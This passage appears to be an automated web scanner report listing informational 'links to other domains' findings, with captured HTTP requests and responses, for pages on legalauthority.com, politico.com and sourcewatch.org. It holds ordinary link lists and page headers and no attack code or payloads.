http://www.accountmanagementcrossing.com/
http://www.actuarialcrossing.com/
http://www.admincrossing.com/
http://www.advertisingcrossing.com/
http://www.aerospacecrossing.com/
http://www.agriculturalcrossing.com/
http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/hb-course/
http://www.architecturecrossing.com/
http://www.attorneyresume.com/
http://www.auditorcrossing.com/
http://www.automotivecrossing.com/
http://www.aviationcrossing.com/
http://www.bcgsearch.com/
http://www.bilingualcrossing.com/
http://www.biotechcrossing.com/
http://www.bluecollarcrossing.com/
http://www.businessanalystcrossing.com/
http://www.businessdevelopmentcrossing.com/
http://www.callcentercrossing.com/
http://www.chefcrossing.com/
http://www.civilengineeringcrossing.com/
http://www.clevelcrossing.com/
http://www.clinicalresearchcrossing.com/
http://www.compliancecrossing.com/
http://www.computeraideddesigncrossing.com/
http://www.constructioncrossing.com/
http://www.consultingcrossing.com/
http://www.contractmanagementcrossing.com/
http://www.counselingcrossing.com/
http://www.cpluspluscrossing.com/
http://www.customerservicecrossing.com/
http://www.dbacrossing.com/
http://www.dentalcrossing.com/
http://www.designingcrossing.com/
http://www.diversitycrossing.com/
http://www.dotnetcrossing.com/
http://www.ecommercecrossing.com/
http://www.edfed.com/
http://www.editingcrossing.com/
http://www.educationcrossing.com/
http://www.employmentauthority.com/
http://www.employmentcrossing.com/
http://www.employmentresearchinstitute.com/
http://www.employmentscape.com/downloadaudio.php?aid=ec8956637a99787bd197eacd77acce5e
http://www.energycrossing.com/
http://www.engineeringcrossing.com/
http://www.entrylevelcrossing.com/
http://www.environmentalcrossing.com/
http://www.environmentalsafetyhealthcrossing.com/
http://www.erpcrossing.com/
http://www.execcrossing.com/
http://www.facilitiescrossing.com/
http://www.financialservicescrossing.com/
http://www.foodservicescrossing.com/
http://www.fundraisingcrossing.com/
http://www.giscrossing.com/
http://www.governmentcrossing.com/
http://www.graduateschoolloans.com/
http://www.healthcarecrossing.com/
http://www.helpdeskcrossing.com/
http://www.hospitalitycrossing.com/
http://www.hound.com/
http://www.hrcrossing.com/
http://www.hvaccrossing.com/
http://www.informationtechnologycrossing.com/
http://www.insurcrossing.com/
http://www.intellectualpropertycrossing.com/
http://www.internshipcrossing.com/
http://www.j2eecrossing.com/
http://www.jd2b.com/
http://www.jdjournal.com/
http://www.journalismcrossing.com/
http://www.judged.com/
http://www.lawcrossing.com/
http://www.lawfirmstaff.com/
http://www.lawschoolloanreport.org/
http://www.lawschoolloans.com/
http://www.legalauthorityfinancial.com/
http://www.logisticscrossing.com/
http://www.managercrossing.com/
http://www.manufacturingcrossing.com/
http://www.marketingcrossing.com/
http://www.mediajobcrossing.com/
http://www.medicalschoolloans.com/
http://www.militarycrossing.com/
http://www.nursingcrossing.com/
http://www.occupationaltherapycrossing.com/
http://www.operationscrossing.com/
http://www.parttimecrossing.com/
http://www.pharmaceuticalcrossing.com/
http://www.physicalsecuritycrossing.com/
http://www.physicaltherapycrossing.com/
http://www.planningcrossing.com/
http://www.postdoctoralfellowcrossing.com/
http://www.prcrossing.com/
http://www.preferredresumes.com/
http://www.procurementcrossing.com/
http://www.productmanagercrossing.com/
http://www.projectmanagementcrossing.com/
http://www.publicinterestcrossing.com/
http://www.publishingcrossing.com/
http://www.purchasingcrossing.com/
http://www.qaqccrossing.com/
http://www.radiocrossing.com/
http://www.realestateandlandcrossing.com/
http://www.recruitingcrossing.com/
http://www.researchingcrossing.com/
http://www.resumeboomer.com/
http://www.retailcrossing.com/
http://www.sciencescrossing.com/
http://www.scientistcrossing.com/
http://www.sellingcrossing.com/
http://www.sqlcrossing.com/
http://www.teenagercrossing.com/
http://www.telecomcrossing.com/
http://www.tradingcrossing.com/
http://www.trainingcrossing.com/
http://www.transportationcrossing.com/
http://www.travelingcrossing.com/
http://www.truckingcrossing.com/
http://www.tvcrossing.com/
http://www.underwritingcrossing.com/
http://www.veterinarycrossing.com/
http://www.volunteercrossing.com/
http://www.workathomecrossing.com/
http://www.writingcrossing.com/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=992k9ej417pj5iq8b87icbaho3; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=992k9ej417pj5iq8b87icbaho3; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 54292


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://srvr19.pdcsrvr.com/vsa/callagent.php?cid=1"></script>
...[SNIP]...
<td valign="top"><a href="http://www.attorneyresume.com/" target="_blank"><img src="http://www.legalauthority.com/images/img-resume.jpg" alt="" width="89" height="110" border="0">
...[SNIP]...
<br><a href="http://www.attorneyresume.com/" target="_blank"><img src="http://www.legalauthority.com/images/ar-logo.jpg" alt="" width="187" height="28" border="0">
...[SNIP]...
<td valign="top"><a href="http://www.employmentscape.com/downloadaudio.php?aid=ec8956637a99787bd197eacd77acce5e" target="_blank"><img src="http://www.legalauthority.com/images/img-mp3.jpg" alt="" width="89" height="76" border="0">
...[SNIP]...
</a>  |  
       <a href="http://www.aharrisonbarnes.com/" target="_blank">FOUNDER HARRISON BARNES' BLOG</a>  |  
       <a href="http://www.bcgsearch.com" target="_blank">LEGAL RECRUITER</a>  |  
<a href="http://www.attorneyresume.com" target="_blank">RESUME SERVICE</a>
...[SNIP]...
<br>
       <a href="http://www.jdjournal.com/" target="_blank">LAW FIRM NEWS</a>  |  
<a href="http://www.lawcrossing.com/" target="_blank">LEGAL JOBS</a>  |  
<a href="http://www.resumeboomer.com/" target="_blank">POST RESUME</a>  |  
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">JOB SEARCH COURSE</a>
...[SNIP]...
<br style="line-height:7px;">
<a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://www.legalauthority.com/images/logo_es.jpg" width="163" height="49" border="0" alt="Employment Research Institute">
...[SNIP]...
<br>
<a href="http://www.100kcrossing.com" target="_blank"> 100KCrossing</a>| <a href="http://www.AccountingCrossing.com" target="_blank"> AccountingCrossing</a>| <a href="http://www.accountmanagementcrossing.com" target="_blank"> AccountManagementCrossing</a>| <a href="http://www.ActuarialCrossing.com" target="_blank"> ActuarialCrossing</a>| <a href="http://www.AdminCrossing.com" target="_blank"> AdminCrossing</a>| <a href="http://www.advertisingcrossing.com" target="_blank"> AdvertisingCrossing</a>| <a href="http://www.AerospaceCrossing.com" target="_blank"> AerospaceCrossing</a>| <a href="http://www.AgriculturalCrossing.com" target="_blank"> AgriculturalCrossing</a>| <a href="http://www.ArchitectureCrossing.com" target="_blank"> ArchitectureCrossing</a>| <a href="http://www.attorneyresume.com" target="_blank"> Attorney Resume</a>| <a href="http://www.AuditorCrossing.com" target="_blank"> AuditorCrossing</a>| <a href="http://www.AutomotiveCrossing.com" target="_blank"> AutomotiveCrossing</a>| <a href="http://www.AviationCrossing.com" target="_blank"> AviationCrossing</a>| <a href="http://www.bcgsearch.com" target="_blank"> BCG Attorney Search</a>| <a href="http://www.BilingualCrossing.com" target="_blank"> BilingualCrossing</a>| <a href="http://www.BioTechCrossing.com" target="_blank"> BiotechCrossing</a>| <a href="http://www.BlueCollarCrossing.com" target="_blank"> BlueCollarCrossing</a>| <a href="http://www.businessanalystcrossing.com" target="_blank"> BusinessAnalystCrossing</a>| <a href="http://www.BusinessDevelopmentCrossing.com" target="_blank"> BusinessDevelopmentCrossing</a>| <a href="http://www.CallCenterCrossing.com" target="_blank"> CallCenterCrossing</a>| <a href="http://www.ChefCrossing.com" target="_blank"> ChefCrossing</a>| <a href="http://www.CivilEngineeringCrossing.com" target="_blank"> CivilEngineeringCrossing</a>| <a href="http://www.CLevelCrossing.com" target="_blank"> CLevelCrossing</a>| <a href="http://www.ClinicalResearchCrossing.com" target="_blank"> ClinicalResearchCrossing</a>| <a href="http://www.ComplianceCrossing.com" target="_blank"> ComplianceCrossing</a>| <a href="http://www.ComputerAidedDesignCrossing.com" target="_blank"> ComputerAidedDesignCrossing</a>| <a href="http://www.ConstructionCrossing.com" target="_blank"> ConstructionCrossing</a>| <a href="http://www.ConsultingCrossing.com" target="_blank"> ConsultingCrossing</a>| <a href="http://www.ContractManagementCrossing.com" target="_blank"> ContractManagementCrossing</a>| <a href="http://www.CounselingCrossing.com" target="_blank"> CounselingCrossing</a>| <a href="http://www.CPlusPlusCrossing.com" target="_blank"> CPlusPlusCrossing</a>| <a href="http://www.CustomerServiceCrossing.com" target="_blank"> CustomerServiceCrossing</a>| <a href="http://www.DBACrossing.com" target="_blank"> DBACrossing</a>| <a href="http://www.DentalCrossing.com" target="_blank"> DentalCrossing</a>| <a href="http://www.DesigningCrossing.com" target="_blank"> DesigningCrossing</a>| <a href="http://www.DiversityCrossing.com" target="_blank"> DiversityCrossing</a>| <a href="http://www.DotNetCrossing.com" target="_blank"> DotNetCrossing</a>| <a href="http://www.ECommerceCrossing.com" target="_blank"> ECommerceCrossing</a>| <a href="http://www.edfed.com" target="_blank"> EdFed</a>| <a href="http://www.EditingCrossing.com" target="_blank"> EditingCrossing</a>| <a href="http://www.EducationCrossing.com" target="_blank"> EducationCrossing</a>| <a href="http://www.EmploymentAuthority.com" target="_blank"> EmploymentAuthority</a>| <a href="http://www.employmentcrossing.com" target="_blank"> EmploymentCrossing</a>| <a href="http://www.EnergyCrossing.com" target="_blank"> EnergyCrossing</a>| <a href="http://www.EngineeringCrossing.com" target="_blank"> EngineeringCrossing</a>| <a href="http://www.EntryLevelCrossing.com" target="_blank"> EntryLevelCrossing</a>| <a href="http://www.EnvironmentalCrossing.com" target="_blank"> EnvironmentalCrossing</a>| <a href="http://www.EnvironmentalSafetyHealthCrossing.com" target="_blank"> EnvironmentalSafetyHealthCrossing</a>| <a href="http://www.erpcrossing.com" target="_blank"> SAPCrossing</a>| <a href="http://www.ExecCrossing.com" target="_blank"> ExecCrossing</a>| <a href="http://www.FacilitiesCrossing.com" target="_blank"> FacilitiesCrossing</a>| <a href="http://www.FinancialServicesCrossing.com" target="_blank"> FinancialServicesCrossing</a>| <a href="http://www.FoodServicesCrossing.com" target="_blank"> FoodServicesCrossing</a>| <a href="http://www.FundraisingCrossing.com" target="_blank"> FundraisingCrossing</a>| <a href="http://www.GISCrossing.com" target="_blank"> GISCrossing</a>| <a href="http://www.GovernmentCrossing.com" target="_blank"> GovernmentCrossing</a>| <a href="http://www.graduateschoolloans.com" target="_blank"> Graduate School Loans</a>| <a href="http://www.HealthcareCrossing.com" target="_blank"> HealthcareCrossing</a>| <a href="http://www.HelpDeskCrossing.com" target="_blank"> HelpDeskCrossing</a>| <a href="http://www.HospitalityCrossing.com" target="_blank"> HospitalityCrossing</a>| <a href="http://www.hound.com" target="_blank"> Hound</a>| <a href="http://www.hrcrossing.com" target="_blank"> HRCrossing</a>| <a href="http://www.HVACCrossing.com" target="_blank"> HVACCrossing</a>| <a href="http://www.InformationTechnologyCrossing.com" target="_blank"> InformationTechnologyCrossing</a>| <a href="http://www.insurcrossing.com" target="_blank"> InsurCrossing</a>| <a href="http://www.IntellectualPropertyCrossing.com" target="_blank"> IntellectualPropertyCrossing</a>| <a href="http://www.InternshipCrossing.com" target="_blank"> InternshipCrossing</a>| <a href="http://www.J2EECrossing.com" target="_blank"> J2EECrossing</a>| <a href="http://www.jd2b.com" target="_blank"> JD2B</a>| <a href="http://www.jdjournal.com" target="_blank"> JDJournal</a>| <a href="http://www.JournalismCrossing.com" target="_blank"> JournalismCrossing</a>| <a href="http://www.judged.com" target="_blank"> Judged</a>| <a href="http://www.lawcrossing.com" target="_blank"> LawCrossing</a>| <a href="http://www.lawfirmstaff.com" target="_blank"> Law Firm Staff</a>| <a href="http://www.lawschoolloanreport.org" target="_blank"> Law School Loan Report</a>| <a href="http://www.lawschoolloans.com" target="_blank"> Law School Loans</a>| <a href="http://www.LegalAuthorityFinancial.com" target="_blank"> Legal Authority Financial</a>| <a href="http://www.LogisticsCrossing.com" target="_blank"> LogisticsCrossing</a>| <a href="http://www.ManagerCrossing.com" target="_blank"> ManagerCrossing</a>| <a href="http://www.ManufacturingCrossing.com" target="_blank"> ManufacturingCrossing</a>| <a href="http://www.marketingcrossing.com" target="_blank"> MarketingCrossing</a>| <a href="http://www.MediaJobCrossing.com" target="_blank"> MediaJobCrossing</a>| <a href="http://www.medicalschoolloans.com" target="_blank"> Medical School Loans</a>| <a href="http://www.MilitaryCrossing.com" target="_blank"> MilitaryCrossing</a>| <a href="http://www.NursingCrossing.com" target="_blank"> NursingCrossing</a>| <a href="http://www.OccupationalTherapyCrossing.com" target="_blank"> OccupationalTherapyCrossing</a>| <a href="http://www.operationscrossing.com" target="_blank"> OperationsCrossing</a>| <a href="http://www.PartTimeCrossing.com" target="_blank"> PartTimeCrossing</a>| <a href="http://www.PharmaceuticalCrossing.com" target="_blank"> PharmaceuticalCrossing</a>| <a href="http://www.PhysicalSecurityCrossing.com" target="_blank"> PhysicalSecurityCrossing</a>| <a href="http://www.PhysicalTherapyCrossing.com" target="_blank"> PhysicalTherapyCrossing</a>| <a href="http://www.PlanningCrossing.com" target="_blank"> PlanningCrossing</a>| <a href="http://www.PostDoctoralFellowCrossing.com" target="_blank"> PostdoctoralFellowCrossing</a>| <a href="http://www.prcrossing.com" target="_blank"> PRCrossing</a>| <a href="http://www.preferredresumes.com" target="_blank"> Preferred Resumes</a>| <a href="http://www.ProcurementCrossing.com" target="_blank"> ProcurementCrossing</a>| <a href="http://www.ProductManagerCrossing.com" target="_blank"> ProductManagerCrossing</a>| <a href="http://www.projectmanagementcrossing.com" target="_blank"> ProjectManagementCrossing</a>| <a href="http://www.PublicInterestCrossing.com" target="_blank"> PublicInterestCrossing</a>| <a href="http://www.PublishingCrossing.com" target="_blank"> PublishingCrossing</a>| <a href="http://www.PurchasingCrossing.com" target="_blank"> PurchasingCrossing</a>| <a href="http://www.qaqccrossing.com" target="_blank"> QAQCCrossing</a>| <a href="http://www.RadioCrossing.com" target="_blank"> RadioCrossing</a>| <a href="http://www.realestateandlandcrossing.com" target="_blank"> RealEstateAndLandCrossing</a>| <a href="http://www.RecruitingCrossing.com" target="_blank"> RecruitingCrossing</a>| <a href="http://www.ResearchingCrossing.com" target="_blank"> ResearchingCrossing</a>| <a href="http://www.RetailCrossing.com" target="_blank"> RetailCrossing</a>| <a href="http://www.sciencescrossing.com" target="_blank"> SciencesCrossing</a>| <a href="http://www.ScientistCrossing.com" target="_blank"> ScientistCrossing</a>| <a href="http://www.sellingcrossing.com" target="_blank"> SellingCrossing</a>| <a href="http://www.SQLCrossing.com" target="_blank"> SQLCrossing</a>| <a href="http://www.TeenagerCrossing.com" target="_blank"> TeenagerCrossing</a>| <a href="http://www.TelecomCrossing.com" target="_blank"> TelecomCrossing</a>| <a href="http://www.TradingCrossing.com" target="_blank"> TradingCrossing</a>| <a href="http://www.TrainingCrossing.com" target="_blank"> TrainingCrossing</a>| <a href="http://www.TransportationCrossing.com" target="_blank"> TransportationCrossing</a>| <a href="http://www.TravelingCrossing.com" target="_blank"> TravelingCrossing</a>| <a href="http://www.TruckingCrossing.com" target="_blank"> TruckingCrossing</a>| <a href="http://www.TVCrossing.com" target="_blank"> TVCrossing</a>| <a href="http://www.UnderWritingCrossing.com" target="_blank"> UnderwritingCrossing</a>| <a href="http://www.VeterinaryCrossing.com" target="_blank"> VeterinaryCrossing</a>| <a href="http://www.VolunteerCrossing.com" target="_blank"> VolunteerCrossing</a>| <a href="http://www.WorkAtHomeCrossing.com" target="_blank"> WorkAtHomeCrossing</a>| <a href="http://www.WritingCrossing.com" target="_blank"> WritingCrossing</a>
...[SNIP]...

14.16. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.politico.com
Path:	/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html?showall

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=10;tile=6;sz=1x1;ord=123456789?
http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=1;tile=1;sz=728x90, 900x90;ord=123456789?
http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=1;tile=2;sz=300x250, 300x600;ord=123456789?
http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=2;tile=3;sz=300x250, 300x600, 1x1;ord=123456789?
http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=3;tile=4;sz=160x600, 300x250, 300x600, 1x1;ord=123456789?
http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=10;tile=6;sz=1x1;ord=123456789?
http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=1;tile=1;sz=728x90, 900x90;ord=123456789?
http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=1;tile=2;sz=300x250, 300x600;ord=123456789?
http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=2;tile=3;sz=300x250, 300x600, 1x1;ord=123456789?
http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=3;tile=4;sz=160x600, 300x250, 300x600, 1x1;ord=123456789?
http://attackerman.firedoglake.com/
http://cache-01.cleanprint.net/cp/ccg?divId=2473
http://deadlinehollywooddaily.com/
http://edge.quantserve.com/quant.js
http://gawker.com/
http://insidecablenews.wordpress.com/
http://itunes.apple.com/app/politico-for-ipad/id406349184?mt=8
http://js.adsonar.com/js/adsonar.js
http://media.nationalreview.com/
http://mediadecoder.blogs.nytimes.com/
http://mediamatters.org/
http://mediamatters.org/countyfair/
http://mediamatters.org/strupp/
http://mediamemo.allthingsd.com/
http://nymag.com/daily/intel/
http://online.wsj.com/article/SB10001424052970203568004576043894046208056.html?KEYWORDS=Assange
http://paidcontent.org/
http://pixel.quantserve.com/api/segments.json?a=p-7bhLrd63bC8jI&callback=qc_callback
http://pixel.quantserve.com/pixel/p-7bhLrd63bC8jI.gif
http://s7.addthis.com/js/250/addthis_widget.js
http://s9.addthis.com/button0-bm.gif
http://thephoenix.com/MediaLog/
http://theplumline.whorunsgov.com/
http://topics.marketwatch.com/Journalists/F/Jon_Friedman/
http://wonkette.com/
http://www.addthis.com/bookmark.php
http://www.alleyinsider.com/
http://www.bloggasm.com/
http://www.businessinsider.com/
http://www.cafepress.com/thepolitico
http://www.dailyfinance.com/bloggers/jeff-bercovici/
http://www.dankennedy.net/
http://www.editorandpublisher.com/eandp/index.jsp
http://www.facebook.com/plugins/like.php?href=http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html&layout=standard&show_faces=false&width=250&action=recommend&font&colorscheme=light
http://www.huffingtonpost.com/media/
http://www.mediabistro.com/fishbowldc/
http://www.mediabistro.com/fishbowlny/
http://www.mediabistro.com/tvnewser/
http://www.mediaite.com/
http://www.mije.org/richardprince/
http://www.newser.com/off-the-grid/news.html
http://www.niemanlab.org/
http://www.nytpick.com/
http://www.observer.com/media?sort=featured
http://www.politicopro.com/
http://www.poynter.org/column.asp?id=45
http://www.quantcast.com/p-7bhLrd63bC8jI
http://www.salon.com/opinion/greenwald/
http://www.theawl.com/
http://www.twitter.com/keachhagey

Request

GET /blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html?showall HTTP/1.1
Host: www.politico.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 29 Dec 2010 21:27:36 GMT
ETag: "905e32-10030-3ce38200"
Content-Type: text/html
Cache-Control: max-age=0
Expires: Fri, 21 Jan 2011 23:39:55 GMT
Date: Fri, 21 Jan 2011 23:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   xmlns:og="http://ope
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7bhLrd63bC8jI&callback=qc_callback"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2473"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=1;tile=1;sz=728x90, 900x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=1;tile=1;sz=728x90, 900x90;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<div id="topPromoArea"> <a href="http://www.politicopro.com" title="POLITICO Pro" target="_blank"><img src="http://images.politico.com/global/promotion/politico_pro_special_section.jpg" border="0" alt="POLITICO Pro" />
...[SNIP]...
<li><a href="http://www.cafepress.com/thepolitico">Store</a>
...[SNIP]...
<p><a href="http://online.wsj.com/article/SB10001424052970203568004576043894046208056.html?KEYWORDS=Assange">The Wall Street Journal reports</a>
...[SNIP]...
<div class="fb-like">

                   <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html&layout=standard&show_faces=false&width=250&action=recommend&font&colorscheme=light" scrolling="no" frameborder="0" style="border:none; overflow: visible; width:447px; height:50px;" allowTransparency="true"></iframe>
...[SNIP]...
<li class="shr-addthis"><a onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this,'','http%3A%2F%2Fwww%2Epolitico%2Ecom%2Fblogs%2Fonmedia%2F1210%2FAssanges%5Fmemoir%5Fadvance%5Ftops%5F1%5Fmillion%2Ehtml','POLITICO%3A%20Assange%E2%80%99s%20memoir%20advance%20tops%20%241%20million%20%2D%20On%20Media%20%2D%20Assange%E2%80%99s%20memoir%20advance%20tops%20%241%20million')" href="http://www.addthis.com/bookmark.php"><img width="83" height="16" alt="" src="http://s9.addthis.com/button0-bm.gif"/></a></li>
   </ul>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=1;tile=2;sz=300x250, 300x600;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=1;tile=2;sz=300x250, 300x600;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
</strong>: <a href="http://www.twitter.com/keachhagey">keachhagey</a>
...[SNIP]...
</div>


   <a class="sb-button" href="http://itunes.apple.com/app/politico-for-ipad/id406349184?mt=8" title="iPad application button" target="_blank"><img src="http://images.politico.com/global/promotion/101210_ipadbutton2_side.jpg" border="0" width="336" alt="iPad application button" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=2;tile=3;sz=300x250, 300x600, 1x1;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=2;tile=3;sz=300x250, 300x600, 1x1;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=3;tile=4;sz=160x600, 300x250, 300x600, 1x1;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=3;tile=4;sz=160x600, 300x250, 300x600, 1x1;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<li><a href="http://attackerman.firedoglake.com/">Attackerman</a>
...[SNIP]...
<li><a href="http://www.bloggasm.com/">Bloggasm</a>
...[SNIP]...
<li><a href="http://www.businessinsider.com/">Business Insider</a>
...[SNIP]...
<li><a href="http://mediamatters.org/countyfair/">County Fair</a>
...[SNIP]...
<li><a href="http://nymag.com/daily/intel/">Daily Intel</a>
...[SNIP]...
<li><a href="http://www.dankennedy.net/">Dan Kennedy</a>
...[SNIP]...
<li><a href="http://thephoenix.com/MediaLog/">Dont Quote Me</a>
...[SNIP]...
<li><a href="http://www.editorandpublisher.com/eandp/index.jsp">Editor & Publisher</a>
...[SNIP]...
<li><a href="http://www.mediabistro.com/fishbowldc/">FishbowlDC</a>
...[SNIP]...
<li><a href="http://www.mediabistro.com/fishbowlny/">FishbowlNY</a>
...[SNIP]...
<li><a href="http://gawker.com/">Gawker</a>
...[SNIP]...
<li><a href="http://www.salon.com/opinion/greenwald/">Glenn Greenwald</a>
...[SNIP]...
<li><a href="http://theplumline.whorunsgov.com/">Greg Sargent</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/media/">Huffington Post -Media</a>
...[SNIP]...
<li><a href="http://insidecablenews.wordpress.com/">Inside Cable News</a>
...[SNIP]...
<li><a href="http://www.dailyfinance.com/bloggers/jeff-bercovici/">Jeff Bercovici</a>
...[SNIP]...
<li><a href="http://topics.marketwatch.com/Journalists/F/Jon_Friedman/">Jon Friedman</a>
...[SNIP]...
<li><a href="http://mediadecoder.blogs.nytimes.com/">Media Decoder</a>
...[SNIP]...
<li><a href="http://mediamatters.org/">Media Matters</a>
...[SNIP]...
<li><a href="http://www.mediaite.com/">Mediaite</a>
...[SNIP]...
<li><a href="http://www.newser.com/off-the-grid/news.html">Michael Wolff</a>
...[SNIP]...
<li><a href="http://www.niemanlab.org/">Nieman Journalism Lab</a>
...[SNIP]...
<li><a href="http://deadlinehollywooddaily.com/">Nikki Finke</a>
...[SNIP]...
<li><a href="http://media.nationalreview.com/">NRO Media Blog</a>
...[SNIP]...
<li><a href="http://www.observer.com/media?sort=featured">NYO (Media)</a>
...[SNIP]...
<li><a href="http://www.nytpick.com/">NYTPicker</a>
...[SNIP]...
<li><a href="http://paidcontent.org/">paidContent</a>
...[SNIP]...
<li><a href="http://mediamemo.allthingsd.com/">Peter Kafka</a>
...[SNIP]...
<li><a href="http://www.mije.org/richardprince/">Richard Prince</a>
...[SNIP]...
<li><a href="http://www.poynter.org/column.asp?id=45">Romenesko</a>
...[SNIP]...
<li><a href="http://www.alleyinsider.com/">Silicon Alley Insider</a>
...[SNIP]...
<li><a href="http://mediamatters.org/strupp/">Strupp</a>
...[SNIP]...
<li><a href="http://www.theawl.com/">The Awl</a>
...[SNIP]...
<li><a href="http://www.mediabistro.com/tvnewser/">TVNewser</a>
...[SNIP]...
<li><a href="http://wonkette.com/">Wonkette</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/politico/blogs-onmedia-entry;pos=10;tile=6;sz=1x1;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/politico/blogs-onmedia-entry;pos=10;tile=6;sz=1x1;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
</script><script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<li><a href="http://www.cafepress.com/thepolitico">Store</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<div><a href="http://www.quantcast.com/p-7bhLrd63bC8jI" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-7bhLrd63bC8jI.gif" style="display: none;" border="0" height="0" width="0" alt="Quantcast" /></a>
...[SNIP]...

14.17. http://www.sourcewatch.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sourcewatch.org
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.sourcewatch.org/index.php?title=Vinson_%26_Elkins_LLP

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.dailykos.com/story/2004/4/22/1551/39504
http://www.google-analytics.com/urchin.js
http://www.knowthecandidates.org/ktc/BushGang/albertogonzalesexpose.htm
http://www.leadershipinstitute.org/pac/detailPAC.cfm?id=C00032797
http://www.mediawiki.org/
http://www.newsmax.com/articles/?a=1996/8/07/222330
http://www.opensecrets.org/pressreleases/july22_99_release.htm
http://www.prwatch.org/cmd/Help+Fight+Spin
http://www.prwatch.org/cmd/index.html
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2002/02/15/BU132842.DTL
http://www.tpj.org/page_view.jsp?pageid=103&pubid=46
http://www.tpj.org/page_view.jsp?pageid=97&pubid=40
http://www.vinson-elkins.com/
http://www.vinson-elkins.com/lawyers/lawyer_detail.asp?H4AttyID=000322375301
http://www.vinson-elkins.com/overview/overview.asp
https://salsa.democracyinaction.org/o/632/t/10397/shop/custom.jsp?donate_page_KEY=6325

Request

GET /index.php?title=Vinson_%26_Elkins_LLP HTTP/1.1
Host: www.sourcewatch.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:45:29 GMT
Server: Apache/2.2.17
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=swatch_sw1151Token;string-contains=swatch_sw1151LoggedOut;string-contains=swatch_sw1151_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
